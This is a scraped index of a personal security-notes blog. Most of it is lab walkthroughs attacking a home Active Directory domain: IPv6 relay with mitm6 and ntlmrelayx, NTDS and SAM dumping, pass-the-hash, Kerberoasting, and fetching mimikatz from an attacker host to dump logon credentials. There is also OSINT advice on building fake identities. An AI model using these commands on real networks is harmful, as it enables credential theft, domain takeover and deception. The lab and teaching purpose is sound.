Kerberoasting attacks also, not limited to auth process of kerberos.\nAbusing trust on IPV6 with AD: Verification if ADCS is installed or not: Check if windows roles are installed: Get-WindowsFeature -Name ADCertificate,ADCS-Cert-Authority If installed you will see a result like this: 2. Check if Certificate Authority service is running:\nGet-Service -Name CertSvc If installed you should see result like this: 3. Check the Certificate Management console: - Open server manager - Tools \u0026gt; certificate authority - If configured it will show the certificate. 4. Check if LDAPS port is listening or not:\nTest-NetConnection -ComputerName localhost -Port 636 Now if nothing is installed follow the following steps: Enabling LDAPS on the Domain controller \u0026gt; open powershell : Install-WindowsFeature -Name ADCertificate,ADCS-Cert-Authority -Restart Next, use the following commands to set up the domain controller as the Enterprise Certification Authority and generate the digital certificate with a validity period of 99 years: Install-AdcsCertificationAuthority -CAType EnterpriseRootCA -CACommonName \u0026#34;MARVEL-HYDRA-DC-CA\u0026#34; -KeyLength 2048 -HashAlgorithmName SHA256 -ValidityPeriod Years -ValidityPeriodUnits 99 When you’re prompted to perform the “Install-AdcsCertificationAuthority” on target “DC1” operation, type A and hit Enter to proceed. After the completion of this process restart the machine: Restart-Computer -Force Performing the attack: Open kali linux along with 2 terminal tabs and in both terminals run 2 commands separately: # first terminal impacket-ntlmrelayx -6 -t ldaps://10.11.12.128 -wh wpad.MARVEL.local -l Desktop/mitm6-loot On the LDAP we have provided the IP of DOMAIN CONTROLLER 2. Now on the second terminal we will perform mitm attack:\nsudo mitm6 -i eth1 -d MARVEL.local Provided the interface where my PUNISHER and DOMAIN CONTROLLER lives 3. Now we need to make an event to occur, reboot the PUNISHER machine and login as DOMAIN ADMIN using username as MARVEL\\Administrator and password as given previously P@$$w0rd! 4. Then just wait , you will see an user is being created along the way on the ntlmrelayx tab 5. Also a dump of the whole DOMAIN has been done inside the directory we have provided for the loot. Let\u0026rsquo;s check that out: open the HTML files to see the data dump Important Remember, mitm6 has to intercept the IPv6 traffic on the network and Impacket has to capture and relay the NTLMv2 hashes across to the domain controller, then extract the objects from Active Directory; therefore, it may not always happen in real time.\nNote In a real-world scenario, the client computers on the network will automatically send a Domain Name System (DNS) message across the IPv6 network at various time intervals. Be patient and you will capture these messages and perform the relay attack. However, the mitm6 tool can create communication issues on the network and should not be running for long durations at a time. Running mitm6 or similar tools can disrupt normal network operations, degrade network performance, and potentially cause unintended denial-of-service (DoS) conditions. Such actions could have serious implications for network reliability and security issues.\nTaking over the domain: Next, let’s use secretsdump to extract the contents of the New Technology Directory Services Directory (NTDS.DIT) file within the domain controller: impacket-secretsdump MARVEL.local/cliZIWbKiD:\u0026#39;ZS:jAYV2y}#e07I\u0026#39;@10.11.12.128 -just-dc-ntlm we’re able to perform a technique known as OS credential dumping: NTDS by extracting sensitive information from the NTDS.dit such as domain usernames, device accounts, and password hashes: 2. Lastly, log in to the domain controller using the Administrator account, then open Server Manager | Tools | Active Directory Users and Computers and you will see that the new user account exists: ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/11-advanced-ad-attacks/00-understanding-kerberos/","summary":"\u003cp\u003eKerberos is a network authentication protocol that runs on Windows Server, which enables clients to authenticate on the network and access services within the Windows domain. Kerberos provides single sign-on (SSO), which allows a user to authenticate once on a network and access resources without having to re-enter their user credentials each time they need to access a new resource, such as a mapped network drive. Kerberos supports delegated authentication, which allows a service running on a client’s computer to act on behalf of the authenticated domain user when it connects to other services on the network. Kerberos supports interoperability, which allows a Windows-based operating system to work in other networks that also use Kerberos as their authentication mechanism. When using Kerberos on a network, it supports mutual authentication, which allows two devices to validate the identity of each other.\u003c/p\u003e","title":"Understanding Kerberos"},{"content":"What is ftk imager? FTK Imager is a free, forensic tool used to create a bit-by-bit copy, or \u0026ldquo;image,\u0026rdquo; of a storage device to preserve it as evidence without altering the original data. It is used by digital investigators to collect and analyze electronic evidence from various sources like hard drives, mobile devices, and removable media. A key feature is its ability to perform integrity checks using hashing algorithms to ensure the forensic image is an accurate and authentic copy, which is crucial for legal admissibility.\nReal-World Applications of FTK Imager: FTK Imager finds extensive use in various domains within digital forensics:\n1. Digital Crime Investigations: FTK Imager assists in collecting evidence for criminal cases, helping investigators build strong cases based on accurate and comprehensive forensic images. 2. Incident Response: During incident response activities, FTK Imager aids in analyzing compromised systems, identifying potential threats, and providing valuable insights into the nature of the incident. 3. E-Discovery: FTK Imager plays a crucial role in e-discovery, allowing for the extraction and analysis of electronic data for legal purposes. This enables organizations to comply with legal requirements and uncover relevant evidence. 4. Data Recovery: In cases involving data loss or deletion, FTK Imager helps retrieve lost or deleted files, providing investigators with critical information for their examinations. Practical Demo: partition creation -\u0026gt; Transferring any file into that partition -\u0026gt; removing it -\u0026gt; creating an image of that partition -\u0026gt; opening it through ftk imager again and seeing if we can see the deleted data or not.\nCreating a separate partition for the practical: Open file manager -\u0026gt; click on This pc -\u0026gt; You may have multiple partition / may not. Now click on the windows button, search for disk management , and open it: You should see your primary partition, right click on it Then select the option shrink volume We only need 1 gb for the partition, to do so write 1024 into this column , and then click on shrink: There should be a new unallocated volume created: Again right click on that newly created volume and select the option New simple volume A wizard like this will pop up, click on next select the default stuffs, and give it a name accordingly, i have given the name FTK Then click on finish The new partition will appear. Installing ftk imager: Search for ftk imager download, come to this following website and click on free download Install the application first on your own. Now let\u0026rsquo;s start the actual practical: Select any image of your choice from your any folder, copy and paste that image into the newly created partition you just made for the practical. After pasting delete it immediately. Now open ftk imager application -\u0026gt; Click on file and select the option create disk image Then select logical dirve -\u0026gt; then select the drive you want to make an image of , then another wizard will pop up after finishing the previous step, click on add option. Then select the option E01 , then give a basic description as you need. Then select a destination folder to store the img file: After that click on start: The image will be created: Go to the destination location, we can see two files are there: First one is a text doc, which will provide us basic info of the case Second one is the actual image the EO1 file .\nKEY FEATURES OF EO1 FILE:\nWhen you create the .E01 file, you are embedding several critical pieces of data directly into the file itself.\nCase Metadata (The Label): At the start of the process, FTK Imager asks you for \u0026ldquo;Evidence Item Information.\u0026rdquo;\nThis includes Case Number, Examiner Name, Notes, Evidence Number, etc.\nAll this information is written into the .E01 file\u0026rsquo;s header. This is a core part of the Chain of Custody—it proves who collected the evidence, when, and why.\nBuilt-in Verification (The Tamper-Proof Seal): This is the most important feature.\nThe .E01 format saves MD5 and/or SHA1 hashes for the entire evidence source.\nWhen you \u0026ldquo;verify\u0026rdquo; the image (or when another tool opens it), it re-calculates the hash of the data and compares it to the original hash stored in the file.\nIf they match: You can state in court that your forensic copy is a perfect, unaltered duplicate of the original drive.\nIf they don\u0026rsquo;t match: The evidence is considered \u0026ldquo;tampered\u0026rdquo; or \u0026ldquo;corrupted.\u0026rdquo;\nCompression (To Save Space): The raw data inside the .E01 container is compressed.\nThis is why your 500 GB drive might result in a 200 GB .E01 file. It intelligently skips empty space and compresses the rest.\nFile Segmentation (Chunking): The E01 format automatically splits the image into smaller, manageable \u0026ldquo;chunks.\u0026rdquo;\nYou will see files like image.E01, image.E02, image.E03, etc.\nThis was originally done because many file systems (like FAT32) couldn\u0026rsquo;t handle single files larger than 4 GB. This standard just continued.\nThe .E01 file is the \u0026ldquo;main\u0026rdquo; file that holds the headers, metadata, and the first chunk of data.\nImage analysis: Come to ftk imager app -\u0026gt; select add evidence item -\u0026gt; this time use the option image file select the image file from the source location: On finishing the step and evidence tree will appear on the left pane. Click through the tree until you find the option Recycle Bin And we can see the image file we previously deleted. ","permalink":"https://0x-s0M3n4th.github.io/notes/miscellaneous/int-250/ftk-imager/","summary":"\u003ch1 id=\"what-is-ftk-imager\"\u003eWhat is ftk imager?\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eFTK Imager\u003c/strong\u003e is a free, forensic tool used to create a bit-by-bit copy, or \u0026ldquo;image,\u0026rdquo; of a storage device to preserve it as evidence without altering the original data. It is used by digital investigators to collect and analyze electronic evidence from various sources like hard drives, mobile devices, and removable media. A key feature is its ability to perform integrity checks using hashing algorithms to ensure the forensic image is an accurate and authentic copy, which is crucial for legal admissibility.\u003c/p\u003e","title":"Practical Demo: Creating a Forensic Image with FTK Imager"},{"content":" Wireshark: Packets: In a real world blue team operation usually the threat analysts are given with \u0026lsquo;PCAP\u0026rsquo; files to analyze which systems are getting affected by the malware / what is the C2 server of the attacker/ where did the malware spread from which time, what\u0026rsquo;s the IP of those infected systems etc. . .\nWhat are PCAP files? -\u0026gt; PCAP file is a exported format of the captured data from Layer 2-7 of the OSI model by wireshark. We can share that captured data to anyone to analyze what happened within this timeframe in the network.\nPractical DEMO: Install the PCAP file from this page: PCAP_FILE Open up wireshark -\u0026gt; sudo wireshark Display filters: Filtering http requests -\u0026gt; {http.request} Source IP filtering -\u0026gt; ip.src==IP_ADDR HTTP,DNS,FTP,ICMP capture filter -\u0026gt; http , ftp , dns , icmp ip.addr == IP_ADDR \u0026amp;\u0026amp; http.request.method == \u0026quot;POST/GET\u0026quot; http.host ==\u0026quot;HOST_NAME\u0026quot; eth.addr==MAC_ADDR We can filter out services using port number also -\u0026gt; tcp.port==80/21/22/23/25/3306/445/139 Analyzing a PCAP file of infections regarding \u0026lsquo;dridex\u0026rsquo; malware -\u0026gt; tls.handshake.type eq 1 right click on TLSv1.2 -\u0026gt; follow -\u0026gt; TCP stream -\u0026gt; Everything is encrypted here. Command used to identify the connections made from the client to execute the actual DLL -\u0026gt; (http.request or tls.handshake.type eq 1) and !(ssdp) We are having the TLS keys to decrypt them Identified the actual dll file -\u0026gt; We will export this file as an object file and then upload it on virus total -\u0026gt; Importing system32 files : Identified the C2 server -\u0026gt; After executing the malware the client is acutally getting connected with the C2 server of the attacker. Device identification using nbns {NetBios Name Service} -\u0026gt; ","permalink":"https://0x-s0M3n4th.github.io/notes/blue-team-ops/00-wireshark/intro-to-wireshark/","summary":"\u003col\u003e\n\u003cli\u003e\n\u003cp\u003eWireshark: \u003cimg alt=\"Wireshark-intro\" loading=\"lazy\" src=\"/images/WIRESHARK_TUT/Wireshark-intro.png\"\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ePackets: \u003cimg alt=\"Packets\" loading=\"lazy\" src=\"/images/WIRESHARK_TUT/Packets.png\"\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eIn a real world blue team operation usually the threat analysts are given with \u0026lsquo;PCAP\u0026rsquo; files to analyze which systems are getting affected by the malware / what is the C2 server of the attacker/ where did the malware spread from which time, what\u0026rsquo;s the IP of those infected systems etc. . .\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cem\u003eWhat are PCAP files?\u003c/em\u003e -\u0026gt; PCAP file is a exported format of the captured data from Layer 2-7 of the OSI model by wireshark. We can share that captured data to anyone to analyze what happened within this timeframe in the network.\u003c/p\u003e","title":"Practical Wireshark"},{"content":"Welcome. If you\u0026rsquo;re here, you\u0026rsquo;re likely passionate about red teaming and the art of the technical write-up. This blog is my contribution to that community. I appreciate you taking the time to be here.\nWhat You’ll Find Here\nRed Teaming Notes\nI share real-world notes and tactics I’ve picked up through learning, labs, and exercises. Think of it as my personal “Field Manual” — from privilege escalation to lateral movement and beyond.\nMy own stuff that i will be learning constantly\nI will be sharing what i am learning on my journey to help people on different topics.\nLab Setups \u0026amp; Exploitations\nI build offensive labs from scratch — Active Directory setups, misconfigurations, pivoting environments — and walk through my exploitations with real tooling and thought process.\nMy Journey\nI also log my personal growth: certifications I pursue, challenges I overcome, and what I learn along the way — raw and unfiltered.\nWho Is This For?\nWhether you’re: - If you are a hardcore learner, it\u0026rsquo;s definately for you.\nThis blog is designed to share, teach, and grow together.\nOngoing Work\nThis site is a live project. I update as I learn — so expect new posts, refined notes, and more lab walkthroughs on weekly basis. I am not the best, i follow many folks to get a ton of knowledge and guidance.\nFeel free to browse through the Blogs, check out my Notes, or dive into Tags to filter by topics of interest.\nHave a great time here !\n","permalink":"https://0x-s0M3n4th.github.io/blogs/welcome/","summary":"\u003cp\u003eWelcome. If you\u0026rsquo;re here, you\u0026rsquo;re likely passionate about red teaming and the art of the technical write-up. This blog is my contribution to that community. I appreciate you taking the time to be here.\u003c/p\u003e\n\u003chr\u003e\n\u003cp\u003e\u003cstrong\u003eWhat You’ll Find Here\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eRed Teaming Notes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eI share real-world notes and tactics I’ve picked up through learning, labs, and exercises. Think of it as my personal “Field Manual” — from privilege escalation to lateral movement and beyond.\u003c/p\u003e","title":"Hello Friend"},{"content":"We will perform various Lateral movement and vertical movement . Vertical movement allows a penetration tester to escalate their privileges within a network, as compared to lateral movement, which focuses on using the same user privileges across multiple systems on the network.\nLateral movement with crackmapexec: Power on kali, THEPUNISHER, Windows server 2022 . We will perform a pass the password attack using the password of the user fcastle across the entire domain. Make sure you have installed crackmapexec on your kali. Use the following command: crackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1 crackmapexec performs SMB enumeration on the targeted network using the creds. Then it uses pwn3d syntax to show that the machine has been affected using the username and password 2. Retrieving the SAM database from the windows devices across the domain using the following command:\ncrackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1 --sam The local usernames and NTLMV1 hashes has been retrieved from the client machine. These hashes can be used in PTH(pass the hash) attack across the network for lateral movement and privesc on other devices. 3. Performing again pass the password attack but using the flag --local-auth using a local admin account credentials, as this is a local account we removed the flag -d which is for domain users/admins:\ncrackmapexec smb 10.11.12.0/24 -u Administrator -p Password1! --local-auth 4. Performing a PTH attack using the hash of the local administrator account, we have retrieved the hash of the local admin from the previous --sam command:\ncrackmapexec smb 172.30.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth # Pass the hash 5. As we can notice that fcastle account has certain admin privileges, we can try to dump the LSA secrets across the domain devices using the following command:\ncrackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1 --lsa Vertical movement using kerberos Important For this attack to work, the time on Kali Linux needs to be in sync with the time on the targeted domain controller. If not, the following message will appear: \u0026quot;Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)\u0026quot; Issue. We will solve this issue during this practical exercise\nOpen kali and install ntpdate using the following command: sudo apt install ntpsec-ntpdate Next, synchronize the time with the targeted domain controller: sudo ntpdate 10.11.12.128 Retrieve the Kerberos TGS ticket hash from the domain controller by using a valid domain user credential to the domain controller: impacket-GetUserSPNs MARVEL.local/fcastle:Password1 -dc-ip 10.11.12.128 -request Note An SPN is a unique identifier for a service instance. SPNs are used in Kerberos authentication to associate a service instance with a service logon account, allowing clients to securely request access to services running on servers.\nSAVE THE TGS HASH INTO A FILE 4. Determine the hashcat code for cracking Kerberos 5 etype 23 hashes. Use 13100 for cracking the TGS hash using hashcat , we are going to use :\nhashcat -h | grep TGS 5. Command for cracking:\nhashcat -m 13100 TGS.txt /usr/share/wordlists/rockyou.txt -O 6. Results, hash cracked and the password is MYpassword123# Lateral movement using mimikatz: Open kali linux , then head over to this path /usr/share/windows-resources/mimikatz/x64 . Start a python web server on the same network as Domain controller Login onto the Domain controller as the SQLService account we attacked during the TGS hash cracking. Use those credentials along with username as MARVEL\\SQLService . Then open cmd as administrator and follow the commands for downloading those files: Invoke-WebRequest -uri http://kali_ip:8000/mimikatz.exe -OutFile mimikatz.exe # Install the 4 files the same way You can get a remote access using evil-winrm and xfreerdp from kali itself using the following commands:\nxfreerdp /v:10.11.12.128 /u:SQLService /p:\u0026#39;MYpassword123#\u0026#39; /d:MARVEL.local # If you are having the hash use \u0026#39;/pth {hash}\u0026#39; instead of \u0026#39;/p\u0026#39; # Syntax: evil-winrm -i IP -u Username -H Hash evil-winrm -i 10.11.12.128 -u SQLService -p \u0026#39;MYpassword123#\u0026#39; To run the mimikatz.exe wither you double click from the file downloaded in Downloads folder, or use the same CLI and type .\\mimikatz.exe Check mimikatz privileges using the following command: privilege::debug The screenshot shows Mimikatz has the necessary privileges to extract the passwords and hashes\nGrabbing credentials using mimikatz: Extract all the user accounts and their password hashes by using the following command: sekurlsa::logonpasswords Mimikatz is able to retrieve all the user details that were stored within the memory of the host device since the last time it was rebooted. 2. To extract the LSA data from the memory of the domain controller, use the following command:\nlsadump::lsa /patch 3. By obtaining the NTLMv1 hashes of each user, you can perform lateral movement throughout the network using the PTH technique and even perform password cracking using hashcat.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/11-advanced-ad-attacks/01-attacking-active-directory/","summary":"\u003cp\u003eWe will perform various \u003ccode\u003eLateral movement and vertical movement\u003c/code\u003e . Vertical movement allows a penetration tester to escalate their privileges within a network, as compared to lateral movement, which focuses on using the same user privileges across multiple systems on the network.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"lateral-movement-with-crackmapexec\"\u003eLateral movement with crackmapexec:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003ePower on \u003ccode\u003ekali, THEPUNISHER, Windows server 2022\u003c/code\u003e . We will perform a pass the password attack using the password of the user \u003ccode\u003efcastle\u003c/code\u003e across the entire domain. Make sure you have installed \u003ccode\u003ecrackmapexec\u003c/code\u003e on your kali. Use the following command:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ecrackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003cimg alt=\"aad_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/AD_adv/02/aad_1.png\"\u003e\n\u003cem\u003ecrackmapexec performs SMB enumeration on the targeted network using the creds. Then it uses \u003ccode\u003epwn3d\u003c/code\u003e syntax to show that the machine has been affected using the username and password\u003c/em\u003e\n2. Retrieving the \u003ccode\u003eSAM\u003c/code\u003e database from the windows devices across the domain using the following command:\u003c/p\u003e","title":"Attacking Active Directory"},{"content":" Passive information gathering is when you use an indirect approach to obtain information about your target. Passive information gathering is when you use an indirect approach to obtain information about your target. This method obtains the information that\u0026rsquo;s publicly available from many sources, thus eliminating direct contact with the potential target. OSINT Gathering information before exploiting and gaining access to a network or system will help the penetration tester narrow the scope of the attack and focus on the security vulnerabilities of the target. This means the penetration tester can design specific types of attacks, exploits, and payloads that are suitable for the attack surface of the target. We will begin our information-gathering phase by utilizing the largest computer network in existence: the internet.\nMostly we will be using different tools like Osintgram, sherlock etc or we can utilize the internet itself. OSINT techniques: Sock puppet: A sock puppet is a piece of terminology that\u0026rsquo;s used within the cybersecurity industry, especially among penetration testers. A sock puppet is simply a misrepresentation of an individual, such as creating an entire fake identity. While pretending to be someone else is unlawful, hackers always create a fake identity on the internet when gathering information about their targets. By creating a misrepresentation of a person on an online platform such as a social media website, no one knows the true identity of the account owner. Therefore, the hacker can pretend to be an employee or a mutual friend of their target to gather data about the organization.\nAnother key aspect of using a sock puppet is to ensure the target does not know who is performing OSINT. This is also a good practice for penetration testers to remain stealthy. One of the best way to hide yourself from getting tracked to use a VPN service.\nCreating fake identity guide: • Creating a fake identity: https://www.fakenamegenerator.com/ • Fake profile picture: https://www.thispersondoesnotexist.com/ • Using a proxy credit card: https://privacy.com/\nTip Remember one thing that always craft usernames/ mail accounts any kind of stuff for OSINT a person, try to know about his/her\u0026rsquo;s personal life, where they work etc, and create fake identities accordingly, not just randomly.\nAlso we can make use of AI for random name generation, as well as Image generation : Anonymizing traffic: The following are common techniques that are used by penetration testers to anonymize their traffic:\nVirtual Private Network (VPN) Proxychains The Onion Router (TOR) Tips to choose which VPN service we need to use: • Using a VPN service provider will require a paid subscription. • Ensure the VPN service provider does not keep logs or sells user data to third parties. • Ensure the VPN service provider provides unmetered bandwidth for users. • Ensure the VPN service provider supports integrating the VPN client application on your operating system. • You can use various cloud service providers such as Azure and AWS to set up your VPN servers on the cloud. • Ensure your Domain Name System (DNS) traffic is not leaking as it will reveal your geolocation data. Use a site such as DNS Leak Test (www.dnsleaktest.com) to check this. • If your VPN service does not support IPv6, ensure you disable IPv6 on your attacker machine.\nI prefer Mullvad VPN.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/02-reconnaissance/01-deep-passive-recon/","summary":"\u003col\u003e\n\u003cli\u003ePassive information gathering is when you use an indirect approach to obtain information about your target.\u003c/li\u003e\n\u003cli\u003ePassive information gathering is when you use an indirect approach to obtain information about your target. This method obtains the information that\u0026rsquo;s publicly available from many sources, thus eliminating direct contact with the potential target.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"osint\"\u003eOSINT\u003c/h2\u003e\n\u003cp\u003eGathering information before exploiting and gaining access to a network or system will help the penetration tester narrow the scope of the attack and focus on the security vulnerabilities of the target. This means the penetration tester can design specific types of attacks, exploits, and payloads that are suitable for the attack surface of the target. We will begin our information-gathering phase by utilizing the largest computer network in existence: the internet.\u003c/p\u003e","title":"Deep Passive Recon"},{"content":" Power on your 4 machines : THE PUNISHER, THESPIDERMAN, WIN_2K22, KALI LINUX Then make sure your THEPUNISHER machine can identify the local network in my case it\u0026rsquo;s MARVEL.local Creating an Antivirus GPO on windows server 2022 , i made this inside win 2019 previously. Use the following commands inside your any windows server: PS C:\\Users\\Administrator\u0026gt; New-GPO -Name \u0026#34;DisableAVGPO\u0026#34; | New-GPLink -Target \u0026#34;DC=MARVEL,DC=local\u0026#34; 4. Next, use the following commands to link the DisableAVGPO policy on the MARVEL.local domain:\nPS C:\\Users\\Administrator\u0026gt; Set-GPLink -Name \u0026#34;DisableAVGPO\u0026#34; -Target \u0026#34;DC=MARVEL,DC=local\u0026#34; -Enforced Yes Working with powerview: PowerView is a powerful PowerShell tool that allows penetration testers to gain in-depth insights into an organization’s Active Directory domain and forest structure. The PowerView tool uses native PowerShell coding (with some modifications) to work better with Active Directory and a Win32 Application Programming Interface (API). This allows PowerView to interact with Active Directory seamlessly. Using PowerView will dramatically improve the process of performing enumeration within Active Directory.\nNote Keep in mind that with the continuous advancement of antimalware and threat detection solutions, Windows Defender may prevent and stop many of these penetration testing tools from being used on a Windows operating system as they are also used by threat actors. Various techniques and strategies can be used to evade detection during a penetration test, but this is beyond the scope of this book. Therefore, in a real-world penetration test, ask the customer for a dedicated domain-joined system with remote access and to permit PowerView.ps1, mimikatz.exe, PsExec64. exe, PSLoggedOn.exe, and any other Windows-based tools for penetration testing on their antimalware solution on the device. You can then use your attacker machine to remotely connect to the domain-joined machine, transfer your tools, and perform the penetration test\nPower on THEPUNISHER, WINDOWS server 2022 and kali linux Open kali and locate powerview.ps1 file and transfer it through python web server Then allow in your kali incoming connection from port 8000 using the following command: sudo ufw status sudo ufw allow 8000 4. Download the script from THEPUNISHER machine using the following command:\niwr -url http://kali_ip:8000/powerview.ps1 -OutFile Powerview.ps1 5. Disable powershell execution policy using the following command:\npowershell -Execution bypass # executing powerview . .\\Powerview.ps1 To retrieve information about your current domain, use the following command: Get-NetDomain Important To retrieve information about another domain with the forest, use the GetNetDomain -Domain \u0026lt;domain-name\u0026gt; command.\nTo retrieve the Security Identifier (SID) of the current domain, use the following command: Get-DomainSID Note Additionally, using the whoami /user command provides you with the domain, username, and SID.\nObtaining a list of domain controller using the command Get-NetDomainController Get-NetDomainController Note To retrieve the identity of the domain controller within another domain of the same forest, use the Get-NetDomainController –Domain \u0026lt;domain-name\u0026gt; command.\nRetrieve information about domain policies use the command Get-DomainPolicy To retrieve a list of all the users on the current domain: Get-NetUser 11. Furthermore, you can view the group memberships of a specific user, as well as their last login and log-off times. 12. Retrieving a list of all domain controllers on the current domain:\nGet-NetComputer 13. Retrieving list of all the groups within current domain:\nGet-NetGroup Important To filter for a specific group, use the Get-NetGroup *keyword* command. For example, Get-NetGroup *admin* will retrieve all the groups that contain the admin keyword.\nTo retrieve all the local groups on a system on the domain, use the following commands: Get-NetLocalGroup -ComuterName THEPUNISHER.MARVEL.local 15. To retrieve all the file shares on all the devices within the current domain, use the following command:\nInvoke-ShareFinder -Verbose 16. Retrieving the list of all the GPOs in the current domain:\nGet-NetGPO 17. To get specific details about the current forest:\nGet-NetForest 18. To retrieve all the domains within the current forest as well as to retrieve all the global catalogs for the current forest that contain information about all objects within the directory use the following command:\nGet-NetForestDomain Get-NetForestCatalog 19. o discover all the devices where the current user has local administrator access on the current domain, use the following command:\nFind-LocalAdminAccess -Verbose I don\u0026rsquo;t have any local admin access on any of the workstations/DC that\u0026rsquo;s why it\u0026rsquo;s showing none.\nEXTRAS:\nCommand 1,2: ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) # second command: whoami /groups This command is a one-liner to check if your current user is a member of the local Administrators group. COMMAND BREAKDOWN: It will return either True or False [Security.Principal.WindowsIdentity]::GetCurrent() This gets your current user\u0026rsquo;s \u0026ldquo;identity.\u0026rdquo; Think of it as grabbing your digital ID card, which lists who you are (e.g., MARVEL\\fcastle) and what groups you belong to. [Security.Principal.WindowsPrincipal] (...) This takes the \u0026ldquo;identity\u0026rdquo; (your ID card) from step 1 and creates a \u0026ldquo;principal\u0026rdquo; object. A principal is an object that represents the security context of the user, allowing you to ask questions about what that user is allowed to do. .IsInRole( ... ) This is a method (a function) of the principal object. You are asking it the question, \u0026ldquo;Is this user in the following role?\u0026rdquo; [Security.Principal.WindowsBuiltInRole]::Administrator This is the specific role you are checking for. Instead of using a name like \u0026ldquo;Administrators\u0026rdquo; (which could change based on the system language), this uses a built-in, language-independent ID (S-1-5-32-544) that always means the local Administrators group. Command 3: This command lists all the users and groups that are members of the local \u0026ldquo;Administrators\u0026rdquo; group on your current machine. It\u0026rsquo;s the PowerView equivalent of the net localgroup administrators command you ran successfully.\nAnother way to bypass execution policy inside powershell for scripts: ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/10-active-directory-attacks/01-enumerating-active-directory/","summary":"\u003col\u003e\n\u003cli\u003ePower on your 4 machines : \u003ccode\u003eTHE PUNISHER, THESPIDERMAN, WIN_2K22, KALI LINUX\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThen make sure your \u003ccode\u003eTHEPUNISHER\u003c/code\u003e machine can identify the local network in my case it\u0026rsquo;s \u003ccode\u003eMARVEL.local\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCreating an \u003ccode\u003eAntivirus GPO on windows server 2022\u003c/code\u003e , i made this inside \u003ccode\u003ewin 2019\u003c/code\u003e previously. Use the following commands inside your any windows server:\n\u003cimg alt=\"ead_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/AD/01/ead_1.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003ePS \u003c/span\u003e\u003cspan class=\"n\"\u003eC:\u003c/span\u003e\u003cspan class=\"p\"\u003e\\\u003c/span\u003e\u003cspan class=\"n\"\u003eUsers\u003c/span\u003e\u003cspan class=\"p\"\u003e\\\u003c/span\u003e\u003cspan class=\"n\"\u003eAdministrator\u003c/span\u003e\u003cspan class=\"p\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"nb\"\u003eNew-GPO\u003c/span\u003e \u003cspan class=\"n\"\u003e-Name\u003c/span\u003e \u003cspan class=\"s2\"\u003e\u0026#34;DisableAVGPO\u0026#34;\u003c/span\u003e \u003cspan class=\"p\"\u003e|\u003c/span\u003e \u003cspan class=\"nb\"\u003eNew-GPLink\u003c/span\u003e \u003cspan class=\"n\"\u003e-Target\u003c/span\u003e \u003cspan class=\"s2\"\u003e\u0026#34;DC=MARVEL,DC=local\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"ead_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/AD/01/ead_2.png\"\u003e\n4. Next, use the following commands to link the \u003ccode\u003eDisableAVGPO\u003c/code\u003e policy on the \u003ccode\u003eMARVEL.local\u003c/code\u003e domain:\u003c/p\u003e","title":"Enumerating Active Directory"},{"content":"DNSMap DNSmap works a bit differently from the tools we looked at in the previous sections. DNSmap attempts to enumerate the subdomains of an organization\u0026rsquo;s domain name by querying a built-in wordlist on Kali Linux. Once a subdomain has been found, DNSmap will also attempt to resolve the IP address automatically. sublist3r You can leverage the power of search engines for discovering sub-domains by using the Sublist3r tool. Sublist3r is a Python-based tool that is used to enumerate (extract/obtain) the subdomains of a given website using OSINT, such as search engines and other internet indexing platforms.\nInstall sublist3r sudo apt update sudo apt install sublist3r Running sublist3r sublist3r -d microsoft.com Use this command to add the results into a file Or you can simply do this: sublist3r -d target_domain 2\u0026gt;1 /dev/null \u0026gt; subdomains.txt 2\u0026gt;1 this will transfer all the errors caused by the command to /dev/null which is a black hole in linux, then outputting \u0026gt; the results into a file. 5. Edit the txt file, and adjust the first 4 entries, remove the comma and then separate two subdomains like this\nmicrosoft.com anotherdomain.com Sub-domain discovery using knockpy: Knockpy is a Python-based tool that is used to enumerate (extract/obtain) the sub-domains of a targeted public domain using OSINT techniques and data sources, such as search engines and other internet indexing platforms.\nInstallation: sudo apt update \u0026amp;\u0026amp; sudo apt install -y knockpy 2. USAGE:\nknockpy --recon --dns 8.8.8.8 -d microsoft.com Note The --recon syntax specifies to perform sub-domain enumeration, --dns syntax enables you to specify a custom DNS server to query, and -d specifies the targeted domain.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/01-enumerating-subdomains/","summary":"\u003ch2 